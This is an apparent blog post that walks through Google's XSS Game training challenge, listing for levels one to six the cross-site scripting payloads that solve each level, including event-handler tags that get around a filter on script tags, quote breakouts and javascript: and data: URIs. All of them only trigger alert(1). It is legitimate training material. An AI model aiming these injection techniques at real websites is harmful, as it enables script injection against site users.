zoukankan      html  css  js  c++  java
  • Google XSS Challenge

    https://xss-game.appspot.com/level1

    https://xss-game.appspot.com/level1

    payload: <svg onload=alert(1)>

    https://xss-game.appspot.com/level2

    过滤掉了<script>关键词

    payloads:

    <svg onload=alert(1)>

    <input autofocus onfocus=alert(1)>

    <video><source onerror="JavaScript:alert(1)">

    <marquee onstart=alert(1)>

    https://xss-game.appspot.com/level3

    payload1: ' onerror='alert(1)' >

    payload2: ' onmouseover=alert(1)//

    https://xss-game.appspot.com/level4

    sourcecode:

    <img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />

    payload1:  5'),alert('1

    payload2:  5'),alert('1')//

    https://xss-game.appspot.com/level5

    payload: javascript:alert(1)

    https://xss-game.appspot.com/level6

    payload: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('1')

  • 相关阅读:
    Linux dd命令
    冲突域
    三次握手与四次挥手
    sizeof +数组名
    程序内存分配
    OSI七层协议模型
    栈的存储结构
    周转时间
    Gson工具类
    spring注入注解
  • 原文地址:https://www.cnblogs.com/hack404/p/10750796.html
Copyright © 2011-2022 走看看